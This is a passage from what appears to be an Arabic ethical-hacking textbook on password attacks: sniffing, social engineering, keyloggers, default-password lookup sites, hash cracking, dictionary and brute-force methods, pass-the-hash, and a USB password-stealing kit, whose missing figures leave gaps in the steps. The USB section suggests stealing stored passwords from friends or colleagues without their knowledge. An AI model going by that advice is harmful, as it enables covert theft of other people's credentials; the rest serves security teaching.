ﻛﻣﺑﯾوﺗر ﻣﻌﯾن ﻋﻠﻰ اﻟﺷﺑﻛﺔ .ﺑﮭذه اﻟطرﯾﻘﺔ ،ﯾﻣﻛن ﻟﻠﻣرء أن ﯾﻧظر إﻟﻰ اﻟرﺳﺎﺋل اﻟﺗﻲ ﻟم ﺗﻛن ﻣوﺟﮭﺔ اﻟﯾﮫ .اﻟﻘراﺻﻧﺔ ﻟدﯾﮭم ﺑراﻣﺞ ﻟﻠﻘﯾﺎم ﺑذﻟك،
وﻣن ﺛم ﻓﺣص ﻛﺎﻓﺔ اﻟرﺳﺎﺋل اﻟﺗﻲ اﺟﺗﺎزت اﻟﺷﺑﻛﺔ ﻣن أﺟل اﻟﺑﺣث ﻋن ﻛﻠﻣﺔ اﻟﺳر .ﻗد ﺗﻛون ﻧﮭﺎﯾﺔ اﻟﻣطﺎف ﺑﺈﻋطﺎء ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑك
إﻟﻰ اﻟﻣﮭﺎﺟم إذا ﻛﻧت ﺗﻘوم ﺑﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﻛﻣﺑﯾوﺗر ﻋﺑر اﻟﺷﺑﻛﺔ ،وﻟﻘد ﺗم اﺧﺗراق ﺑﻌض أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﺑﮭذه اﻟطرﯾﻘﺔ.
ﺑﺎﺳﺗﺧدام ھذه اﻟﺗﻘﻧﯾﺔ ،password sniffing techniqueﻓﺎن اﻟﻣﺗﺳﻠﻠﯾن ﻗد ﺟﻣﻌوا اﻵﻻف ﻣن ﻛﻠﻣﺎت اﻟﻣرور ﻋن طرﯾﻖ اﻗﺗﺣﺎم أﺟﮭزة
اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺗﺻﻠﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﺑﻛﺛرة.
اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ) : (Social Engineeringﻓﻲ اﻣن اﻟﻛوﻣﺑﯾوﺗر ،اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ھو اﻟﻣﺻطﻠﺢ اﻟذي ﯾﻣﺛل ﻧوﻋﺎ ﻏﯾر ﺗﻘﻧﻲ ﻣن
اﻟﺗﺳﻠل .ﻋﺎدة ،ھذا ﯾﻌﺗﻣد ﺑﺷﻛل ﻛﺑﯾر ﻋﻠﻰ اﻟﺗﻔﺎﻋل ﺑﯾن اﻹﻧﺳﺎن وﯾﻧطوي ﻋﻠﻰ ﺧداع اﻵﺧرﯾن ﻓﻲ ﻛﺳر اﻹﺟراءات اﻷﻣﻧﯾﺔ اﻟﻣﻌﺗﺎدة ﻓﻲ ﻛﺛﯾر ﻣن
اﻷﺣﯾﺎن .ﯾﻌﻣل اﻟﻣﮭﻧدس اﻻﺟﺗﻣﺎﻋﻲ "ﻟﻌﺑﺔ ﺧداع" ﻟﻛﺳر اﻹﺟراءات اﻷﻣﻧﯾﺔ .ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،أن ﯾﻘوم اﻟﻣﮭﺎﺟم ﺑﺎﺳﺗﺧدام اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ
ﻻﻗﺗﺣﺎم ﺷﺑﻛﺔ اﻟﻛﻣﺑﯾوﺗر ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﻛﺳب ﺛﻘﺔ ﺷﺧص ﻣﺧول ﻟﻠوﺻول إﻟﻰ اﻟﺷﺑﻛﺔ ،ﺛم ﯾﺣﺎول اﺳﺗﺧراج اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗﮭدد أﻣن اﻟﺷﺑﻛﺎت.
اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ھﻲ اﻟﺗﺷﻐﯾل ﻣن ﺧﻼل ﺗدﺑﯾر اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻣن ﻗﺑل اﻟﺧداع أو .swaying peopleﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺗﺣرﯾف ﻧﻔﺳﮫ ﺑﺄﻧﮫ
ﻣﺳﺗﺧدم أو ﻣﺳؤول اﻟﻧظﺎم ﻣن أﺟل اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﻣن اﻟﻣﺳﺗﺧدم .ﻓﻣن اﻟطﺑﯾﻌﻲ ﻟﻠﻧﺎس ان ﯾﻛوﻧوا ﻣﻔﯾدﯾن وﯾﺛﻘون .أي ﺷﺧص
ﻋﻣوﻣﺎ ﯾﺟﻌل ﻣﺣﺎوﻟﺔ ﻟﺑﻧﺎء ﻋﻼﻗﺎت ودﯾﺔ ﻣﻊ أﺻدﻗﺎء ﻟﮫ أو اﻟزﻣﻼء .ﻓﺎن اﻟﻣﮭﻧدﺳﯾن اﻻﺟﺗﻣﺎﻋﯾن ﯾﺳﺗﻔﺎدوا ﻣن ھذا اﻻﺗﺟﺎه.
اﻟﺳﻣﺔ أﺧرى ﻟﻠﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ﺗﻌﺗﻣد ﻋﻠﻰ ﻋدم ﻗدرة اﻟﻧﺎس ﻋﻠﻰ ﻣواﻛﺑﺔ ھذه اﻟﺛﻘﺎﻓﺔ اﻟﺗﻲ ﺗﻌﺗﻣد ﺑﺷﻛل ﻛﺑﯾر ﻋﻠﻰ ﺗﻛﻧوﻟوﺟﯾﺎ اﻟﻣﻌﻠوﻣﺎت .ﻣﻌظم
اﻟﻧﺎس ﻟﯾﺳوا ﻋﻠﻰ ﺑﯾﻧﺔ ﻣن ﻗﯾﻣﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﻣﺗﻠﻛﮭﺎ وﻗﻠﯾﻼ ﻣﺎ ﯾﺗﮭﺎوﻧوا ﻓﻲ ﺣﻣﺎﯾﺗﮭﺎ .اﻟﻣﮭﺎﺟﻣون ﯾﺳﺗﻔﺎدون ﻣن ھذه اﻟﺣﻘﯾﻘﺔ ﻟﻠﺗﺳﻠل .ﻋﺎدة،
اﻟﻣﮭﻧدﺳﯾن اﻻﺟﺗﻣﺎﻋﯾﺔ ﯾﺑﺣﺛوا ﻓﻲ ﻣﻛﺑﺎت اﻟﻧﻔﺎﯾﺎت ﺑﺣث ﻋن ﻣﻌﻠوﻣﺎت ﻗﯾﻣﺔ .أﻓﺿل دﻓﺎع ھو اﻟﺗﺛﻘﯾف ،واﻟﺗدرﯾب ،وﺧﻠﻖ اﻟوﻋﻲ.
Keyboard Sniffingﯾﺳﻣﺢ ﻟك ﺑﺗﻔﺳﯾر ﻛﻠﻣﺔ ﻣرور اﻟﺗﻲ ﯾدﺧﻠﮭﺎ اﻟﮭدف ﺑواﺳطﺔ ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ ﺑﺎﺳﺗﺧدام .Keylogger
Default Passwords
اﻟﻣﺻدرhttp://securityoverride.org/default-password-list :
ﻛﻠﻣﺎت اﻟﺳر اﻻﻓﺗراﺿﯾﺔ ھﻲ ﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ﺗوﻓرھﺎ اﻟﺷرﻛﺎت اﻟﻣﺻﻧﻌﺔ ﻣﻊ اﻟﻣﻌدات ﺟدﯾدة .ﻋﺎدة ﻣﺎ ﺗﻛون ﻛﻠﻣﺔ اﻟﻣرور اﻻﻓﺗراﺿﯾﺔ اﻟﺗﻲ
ﺗﻘدﻣﮭﺎ اﻟﺷرﻛﺎت اﻟﻣﺻﻧﻌﺔ ﻟﻸﺟﮭزة ﻛﻠﻣﺔ اﻟﺳر اﻟﻣﺣﻣﯾﺔ ﯾﺳﻣﺢ اﻟوﺻول اﻟﻰ اﻟﺟﮭﺎز أﺛﻧﺎء اﻹﻋداد اﻷوﻟﻲ .أدوات اﻹﻧﺗرﻧت اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ
ﻟﻠﺑﺣث ﻋن ﻛﻠﻣﺎت اﻟﺳر اﻻﻓﺗراﺿﯾﺔ ﻛﺎﻻﺗﻰ.
http://cirt.net
http://default-password.info
http://www.defaultpassword.us
http://www.passwordsdatabase.com
https://w3dt.net
http://www.virus.org
http://open-sez.me
http://securityoverride.org
http://www.routerpasswords.com
ﺣﻠﻘﺔ For loopاﻟرﺋﯾﺳﯾﺔ ﯾﻣﻛﻧﮭﺎ اﺳﺗﺧراج أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﺳر ﻣن ﻣﻠف اﻟﻧص اﻟﺗﻲ ھﻲ ﺑﻣﺛﺎﺑﺔ اﻟﻘﺎﻣوس ﻷﻧﮭﺎ ﺗﺗﻛرر ﻣن ﺧﻼل
ﻛل ﺳطر:
ﯾﺣﺗوي اﻟﻣﻠف outfile.txtﻋﻠﻰ اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور اﻟﺻﺣﯾﺣﯾن .إذا ﻛﺎن اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ اﻟﻣﻠف
credentials.txtﺻﺣﯾﺣﺔ .إذا ﻓﺎﻧﮫ ﯾﻣﻛن ﺗﺄﺳﯾس ﺟﻠﺳﺔ ﻣﻔﺗوﺣﺔ ﻣﻊ ﺧﺎدم اﻟﺿﺣﯾﺔ ﺑﺎﺳﺗﺧدام ﻧظﺎم اﻟﻣﮭﺎﺟم.
ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ھو ﺑﺎﻟﺗﺄﻛﯾد وﺳﯾﻠﺔ ﻣﻔﯾدة ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات وﯾﺳﻣﺢ ﻟﻧﺎ ﻟﻠﺣﺻول ﻋﻠﻰ ﺣﻘوق إدارﯾﺔ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف ﻓﻲ ﻛﺛﯾر ﻣن
اﻷﺣﯾﺎن .ﺳﺑب آﺧر ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر وﺗﺻﺎﻋد اﻻﻣﺗﯾﺎزات ھو أن اﻟﻌدﯾد ﻣن اﻷدوات اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ اﻟﻧﺣو اﺧﺗﺑﺎر اﻻﺧﺗراق ﺗﺗطﻠب اﻟوﺻول
اﻟﻰ ﻣﺳﺗوى اﻹدارة ﻣن أﺟل اﻟﺗﺛﺑﯾت واﻟﺗﻧﻔﯾذ ﺑﺷﻛل ﺻﺣﯾﺢ.
إذا ﻛﻧت ﻧﺳﺗطﯾﻊ اﻟوﺻول إﻟﻰ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف ،ﻓﺎن ھﻧﺎك اﺣﺗﻣﺎﻻت ﺟﯾدة ﻣﻊ ﻣﺎ ﯾﻛﻔﻲ ﻣن اﻟوﻗت ،ﻓﯾﻣﻛﻧك ﻛﺳر ﻛﻠﻣﺔ
اﻟﺳر ،ﺣﯾث ﯾﻣﻛن اﻛﺗﺷﺎف اﻟﻧﺳﺧﺔ اﻟﻐﯾر ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ اﻟﻣرور .ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ) (Password hashھﻲ ﻧﺳﺧﮫ ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ
اﻟﻣرور اﻟﻌﺎدﯾﺔ .اﻟﮭﺎش ھﻲ ﻋﺎدة ﻣﺎ ﺗﻛون أﻛﺛر ﻣن ﻣﺟرد إﻋﺎدة ﺗرﺗﯾب ﻛﻠﻣﺔ اﻟﻣرور اﻷﺻﻠﯾﺔ .وھﻲ ﻋﺎدة ﻣﺎ ﺗﻛون ھﺎش ﻓﻲ اﺗﺟﺎه واﺣد.
اﻟﮭﺎش ﻓﻲ اﺗﺟﺎه واﺣد ھو ﺳﻠﺳﻠﺔ ﻣن اﻷﺣرف اﻟﺗﻲ ﻻ ﯾﻣﻛن ﻋﻛﺳﮭﺎ إﻟﻰ ﻧص أﺻﻠﻲ.
وﻣﻊ ذﻟك ،ﻻ ﺗﻧﺷﺄ ﻧﻘﺎط ﺿﻌف ﻣن ﻋﻣﻠﯾﺔ اﻟﮭﺎش ﻧﻔﺳﮭﺎ ،وﻟﻛن ﻣن ﺗﺧزﯾن ﻛﻠﻣﺔ اﻟﻣرور .ﻻ ﯾﺗم ﻓك ﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ وﻗت
اﻟﻣﺻﺎدﻗﺔ ﻣن ﻗﺑل ﻣﻌظم اﻷﻧظﻣﺔ .ھذه اﻟﻧظم ﺗﺧزن ﻓﻘط اﻟﮭﺎش ﻓﻲ اﺗﺟﺎه واﺣد.
أﺛﻧﺎء ﻋﻣﻠﯾﺔ ﺗﺳﺟﯾل اﻟدﺧول اﻟﻣﺣﻠﯾﺔ ،ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﯾﺗم إدﺧﺎﻟﮭﺎ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻣن ﺧﻼل ﺧوارزﻣﯾﺔ ﺗوﻟﯾد اﻟﮭﺎش ﻓﻲ اﺗﺟﺎه واﺣد وﻣﻘﺎرﻧﺗﮭﺎ
ﺑﺎﻟﮭﺎش اﻟﻣﺧزن ﻋﻠﻰ اﻟﻧظﺎم .إذا وﺟدا ﺗﺷﺎﺑﮭﮫ ﺑﯾﻧﮭم ،إذا ﻓﮭذه ﻛﻠﻣﺔ اﻟﻣرور اﻟﺻﺣﯾﺣﺔ اﻟﺗﻲ ﺗم اﺳﺗﺧداﻣﮭﺎ .ﻟذﻟك ،ﻛل ﻣﺎ ﻟدي اﻟﻣﮭﺎﺟﻣﯾن اﻟﻘﯾﺎم ﺑﮫ
ﻣن أﺟل ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ھو اﻟﺣﺻول ﻋﻠﻰ ﻧﺳﺧﺔ ﻣن اﻟﮭﺎش ﻓﻲ اﺗﺟﺎه واﺣد اﻟﻣﺧزﻧﺔ ﻋﻠﻰ اﻟﺧﺎدم ،وﻣن ﺛم اﺳﺗﺧدام ﺧوارزﻣﯾﺔ ﺗوﻟﯾد اﻟﮭﺎش
اﻟﺧﺎﺻﺔ ﺑﮫ ﺣﺗﻰ ﯾﺣﺻل ﻋﻠﻰ ﺗطﺎﺑﻖ .ﻣﻌظم أﻧظﻣﺔ ﻣﺎﯾﻛروﺳوﻓت ،وﯾوﻧﯾﻛس ،و Netwareﻗد أﻋﻠﻧوا ﻋﻠﻰ اﻟﻣﻸ ﺧوارزﻣﯾﺎت اﻟﮭﺎش اﻟﺧﺎﺻﺔ
ﺑﮭم .ھذا اﻟﮭﺎش ﯾﻣﻛن اﻟوﺻول اﻟﯾﮫ إﻣﺎ ﻋن ﺑﻌد أو ﻣﺣﻠﯾﺎ .ﺑﻐض اﻟﻧظر ﻋن ﻛﯾف ﯾﻣﻛﻧﻧﺎ اﻟوﺻول إﻟﻰ اﻟﮭﺎش ،ﻓﺎن اﻟﺧطوات واﻷدوات اﻟﻼزﻣﺔ
ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻻ ﺗزال ھﻲ ﻧﻔﺳﮭﺎ.
ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن اﺳﺗﺧدام ﻣزﯾﺞ ﻣن أﺳﺎﻟﯾب اﻟﮭﺟوم ﻟﻠﺣد ﻣن اﻟوﻗت اﻟذي ﯾطﻠﺑﮫ ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور .ﯾوﻓر اﻹﻧﺗرﻧت ﺗطﺑﯾﻘﺎت ﻣﺟﺎﻧﯾﺔ ﻟﻛﺳر ﻛﻠﻣﺔ
اﻟﻣرور ﻷﻧظﻣﺔ ،Netware ،NTوﯾوﻧﯾﻛس.
ھﻧﺎك ﻗواﺋم ﻟﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ﯾﻣﻛﻧﮭﺎ ﺗﻐذﯾﺔ ھذه crackerﻟﺗﻧﻔﯾذ ھﺟوم اﻟﻘﺎﻣوس) . (Dictionary attackﻓﻲ أﺑﺳط أﺷﻛﺎﻟﮭﺎ ،ﻓﺎن اﻟﺗﺷﻐﯾل
اﻵﻟﻲ ) (Automatedﯾﻧطوي ﻋﻠﻰ اﻟﻌﺛور ﻋﻠﻰ ﻣﺳﺗﺧدم ﺻﺎﻟﺢ وﺧوارزﻣﯾﺔ اﻟﺗﺷﻔﯾر اﻟﻣﺳﺗﺧدﻣﺔ ﺧﺎﺻﺗﮫ ،واﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر
اﻟﻣﺷﻔرة ،وﺧﻠﻖ ﻗﺎﺋﻣﺔ ﻣن ﺟﻣﯾﻊ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻣﻛﻧﺔ ،ﺗﺷﻔﯾر ﻛل ﻛﻠﻣﺔ ،واﻟﺗﺣﻘﻖ ﻣن وﺟود أي ﺗﺳﺎو ﻣﻊ ھوﯾﺔ اﻟﻣﺳﺗﺧدم اﻟﻣﻌروﻓﺔ). (user ID
وﺗﺗﻛرر ھذه اﻟﻌﻣﻠﯾﺔ ﺣﺗﻰ ﯾﺗم اﻟﺣﺻول ﻋﻠﻰ اﻟﻧﺗﺎﺋﺞ اﻟﻣرﺟوة أو ﯾﺗم اﺳﺗﻧﻔﺎد ﺟﻣﯾﻊ اﻟﺧﯾﺎرات.
ﻓﻲ أﺑﺳط أﺷﻛﺎﻟﮫ ﻓﺎن ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﺗﺗﻛون ﻣن ﺟزأﯾن:
-1ﺗﺣدﯾد ﻣوﻗﻊ وﺗﺣﻣﯾل ﻣﻠف ھﺎش ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻧظﺎم اﻟﻣﺳﺗﮭدف.
-2اﺳﺗﺧدام اﻷدوات ﻟﺗﺣوﯾل ھﺎش )اﻟﻣﺷﻔرة( ﻛﻠﻣﺎت اﻟﺳر إﻟﻰ ﻛﻠﻣﺔ ﻣرور ﻋﺎدﯾﮫ.
ﻣﻌظم أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﻻ ﺗﺧزن ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑك اﻟﺗﻲ ﺗدﺧﻠﮭﺎ ﻛﻘﯾﻣﺔ ﻋﺎدﯾﮫ ،ﺑل أﻧﮭﺎ ﺗﺧزن ﻓﻲ ھﯾﺋﺔ ﻧﺳﺧﺔ ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ اﻟﻣرور.
وﯾﺳﻣﻰ ھذا اﻹﺻدار ﻣن اﻟﺗﺷﻔﯾر اﻟﮭﺎش).(HASH
ﻣﻌظم أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺗﺧزﯾن ھﺎش ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم ﻓﻲ ﻣﻛﺎن واﺣد .ھذا اﻟﻣﻠف ) (HASHﻋﺎدة ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺷﻔرة
ﻟﻌدة ﻣﺳﺗﺧدﻣﯾن وﺣﺳﺎﺑﺎت اﻟﻧظﺎم .ﻟﻸﺳف ،اﻟوﺻول إﻟﻰ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ﻟﯾﺳت ﺳوى ﻧﺻف اﻟﻣﻌرﻛﺔ ﻟﻣﺟرد ﻋرض أو ﺣﺗﻰ ﺣﻔظ ھﺎش
ﻛﻠﻣﺔ اﻟﻣرور ﻟﯾﺳت ﻛﺎﻓﯾﺔ ﻟﺗﺣدﯾد اﻟﻧص اﻟﻌﺎدي ﻟﻛﻠﻣﺔ اﻟﻣرور .ذﻟك ﻷن ﻣن اﻟﻧﺎﺣﯾﺔ اﻟﻔﻧﯾﺔ ﻟﯾس ﻣن اﻟﻣﻔﺗرض أن ﯾﻛون ﻣن اﻟﻣﻣﻛن اﻟﻌﻣل اﻟﻰ
اﻟوراء أي ﺗﺣوﯾل اﻟﮭﺎش إﻟﻰ ﻧص ﻋﺎدي.
ﻣﻠﺣوظﮫ :ھﻧﺎك ھﺟوم ﯾﺳﻣﻰ " " Pass the hashاﻟذي ﯾﺳﻣﺢ ﻟك ﺑﺗﻐﯾر أو إﻋﺎدة إرﺳﺎل ﻗﯾﻣﺔ اﻟﮭﺎش ﻣن ﻛﻠﻣﺔ ﻣرور ﻣن أﺟل اﻟﻣﺻﺎدﻗﺔ
ﻣﻊ اﻟﺧدﻣﺔ اﻟﻣﺣﻣﯾﺔ .ﻋﻧد اﺳﺗﺧدام ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ،ﻓﻠﯾس ھﻧﺎك ﺣﺎﺟﺔ ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر واﻛﺗﺷﺎف ﻧﺳﺧﺗﮭﺎ اﻟﻐﯾر ﻣﺷﻔره.
ﻣن أﺟل اﻛﺗﺷﺎف اﻟﻧﺳﺧﺔ اﻟﻐﯾر ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ ﻣرور ،ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ ﺑﻌض ﻣن اﻟﺧطوات اﻟﻣﮭﻣﺔ:
-اﻟﻌﺛور ﻋﻠﻰ ﻣﺳﺗﺧدم ﺻﺎﻟﺢ.
-ﺗﺣدﯾد ﺧوارزﻣﯾﺔ اﻟﺗﺷﻔﯾر )اﻟﮭﺎش( اﻟﻣﺳﺗﺧدﻣﺔ.
-اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺷﻔرة.
-إﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻣﻛﻧﺔ.
-ﺗﺷﻔﯾر ﻛل ﻛﻠﻣﺔ ﺑﺎﺳﺗﺧدام ﻧﻔس اﻟﺧوارزﻣﯾﺔ.
-ﻣﻌرﻓﺔ ﻣﺎ إذا ﻛﺎن ھﻧﺎك ﺗطﺎﺑﻖ ﻟﻛل ھوﯾﺔ اﻟﻣﺳﺗﺧدم.
https://www.facebook.com/tibea2004 د .ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ
337
A simple dictionary attack -1واﻟذى ﯾﺷﻣل ﺗﺣﻣﯾل ﻣﻠف اﻟﻘﺎﻣوس )اﻟﻣﻠف اﻟﻧﺻﻲ اﻟذى ﯾﺣﺗوى ﻛﻠﻣﺎت اﻟﻘﺎﻣوس( ﻓﻲ ﺗطﺑﯾﻖ
ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻣﺛل LOphtCrackأو ،John the Ripperﺛم ﺗﺷﻐﯾﻠﮫ ﺿد ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن ﺣﯾث ﯾوﺟد اﻟﺗطﺑﯾﻖ.
ھﺟﻣﺎت اﻟﻘﺎﻣوس ) (Dictionary attackھﻲ أﻛﺛر ﻓﻌﺎﻟﯾﺔ ﻣﻊ اﻟﻛﻠﻣﺎت اﻟطوﯾﻠﺔ.
The brute force method -2ھو اﻷﻛﺛر ﺷﻣوﻻ ،ﻋﻠﻰ اﻟرﻏم ﻣن ﺑطﺋﮫ .ﻋﺎدة ﻣﺎ ﯾﺣﺎول ﻛل ﺣرف ﻣﻣﻛن ،وﺗرﻛﯾﺑﺎت اﻷرﻗﺎم ﻓﻲ
اﻻﺳﺗﻛﺷﺎف اﻵﻟﻲ). (automated exploration
A hybrid approach -3ھو واﺣد ﯾﺟﻣﻊ ﺑﯾن ﻣﯾزات ﻛل ﻣن اﻷﺳﺎﻟﯾب اﻟﺳﺎﺑﻘﺔ .وﻋﺎدة ﻣﺎ ﯾﺑدأ ﻣﻊ اﻟﻘﺎﻣوس ،ﺛم ﯾﺣﺎول ﺗرﻛﯾﺑﺎت ﻣﺛل
ﻛﻠﻣﺗﯾن ﻣﻌﺎ أو ﻛﻠﻣﺔ وأرﻗﺎم.
ﯾﻣﯾل اﻟﻣﺳﺗﺧدﻣﯾن إﻟﻰ اﻣﺗﻼك ﻛﻠﻣﺎت ﺳر ﺿﻌﯾﻔﺔ ﻷﻧﮭم ﻻ ﯾﻌرﻓون ﻣﺎ ھو ﺷﻛل ﻛﻠﻣﺎت اﻟﻣرور اﻟﻘوﯾﺔ ،وﺑﺎﻟﺗﺎﻟﻲ ،ﻻ ﯾﻌرﻓون ﻛﯾﻔﯾﺔ إﻧﺷﺎء ﻛﻠﻣﺎت
ﻣرور ﻗوﯾﺔ ﻟﺣﺳﺎﺑﺎﺗﮭم .ﻛﻣﺎ ھو ﻣﺑﯾن ،وھذا ﯾﺗرك ﻛﻠﻣﺎت اﻟﺳر ﻣﻔﺗوﺣﺔ ﻟﻠﮭﺟوم.
ﺑﺎﺳﺗﺧدام ﻣﺣرك أﻗراص . USBھذا ﯾﺗطﻠب ﺗوﺻﯾل USBﻓﻲ أي ﻣﻧﻔذ ﻟﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗم ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﺳر .ھذه اﻟﺣﯾﻠﺔ ھﻲ ﻗﺎﺑﻠﺔ
ﻟﻠﺗطﺑﯾﻖ ل ﻧظﺎم اﻟﺗﺷﻐﯾل ، Windows XPوﯾﻧدوز ،7وﯾﻧدوز ﻓﯾﺳﺗﺎ ،وﯾﻧدوز .2000
ﺟﻣﯾﻊ اﻟﺗطﺑﯾﻘﺎت اﻟﻣدرﺟﺔ ﻓﻲ USBھﻲ ﻣﺣﻣوﻟﺔ وﺧﻔﯾﻔﺔ ﺑﻣﺎ ﯾﻛﻔﻲ ﺑﺣﯾث ﯾﻣﻛن ﺗﺣﻣﯾﻠﮭﺎ ﻓﻲ ﻗرص USBﻓﻲ ﺑﺿﻊ ﺛوان .ﯾﻣﻛﻧك أﯾﺿﺎ ﻗرﺻﻧﺔ
ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧزﻧﺔ اﻟﺧﺎﺻﺔ ﺑﺎﻠ .Messengerﺑﺎﺳﺗﺧدام أدوات و USBﯾﻣﻛﻧك إﻧﺷﺎء rootkitاﻹﺧﺗراق ﻛﻠﻣﺎت اﻟﺳر ﻣن اﻟﻛﻣﺑﯾوﺗر
اﻟﮭدف.
ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر ﺑﺎﺳﺗﺧدام ﺟﮭﺎز USBﺗﺗم ﺑﻣﺳﺎﻋدة ﻣن اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ:
ﺑﻌد ذﻟك ،ﻧﻘوم ﺑﺣﻔظ اﻟﻣﻠف ك launch.batوﻧﺳﺦ ھذا اﻟﻣﻠف إﻟﻰ ﻣﺣرك اﻷﻗراص .USB
-5إدراج ﻣﺣرك اﻷﻗراص USBوﻧﺎﻓذة اﻟﺗﺷﻐﯾل اﻟﺗﻠﻘﺎﺋﻲ اﻟﻣﻧﺑﺛﻘﺔ ).(if enabled
-6ﯾﺗم ﺗﻧﻔﯾذ أدوات ﻗرﺻﻧﺔ ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ اﻟﺧﻠﻔﯾﺔ ،وﯾﻣﻛن ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻣﻠﻔﺎت TXTﻓﻲ ﻣﺣرك اﻷﻗراص .USB
ﺑﮭذه اﻟطرﯾﻘﺔ ،ﯾﻣﻛﻧك إﻧﺷﺎء USB password recovery toolkitﺧﺎص ﺑك واﺳﺗﺧداﻣﮫ ﻟﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺧزﻧﺔ ﻣن أﺻدﻗﺎﺋك أو
زﻣﻼﺋك ﻣن دون ﻋﻠﻣﮭم .ھذه اﻟﻌﻣﻠﯾﺔ ﺗﺳﺗﻐرق ﺳوى ﺑﺿﻊ ﺛوان ﻻﺳﺗرداد ﻛﻠﻣﺎت اﻟﺳر.
ﯾﻣﺛل اﻟﺗوﺿﯾﺢ اﻟﺗﺻوﯾري اﻟﺗﺎﻟﻲ طرﯾﻖ اﻟﻣﮭﺎﺟﻣﯾن ﻟﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﻣرور ﺑﺎﺳﺗﺧدام .Keyloggers
ﻋﻧد ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﻣرور ،ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﺻﯾب أوﻻ PCاﻟﺿﺣﯾﺔ ﻣﻊ ﺑرﻣﺟﯾﺎت .Keyloggersﻋﻧد دﺧول اﻟﺿﺣﯾﺔ إﻟﻰ ﺧﺎدم اﻟدوﻣﯾن ﻣن
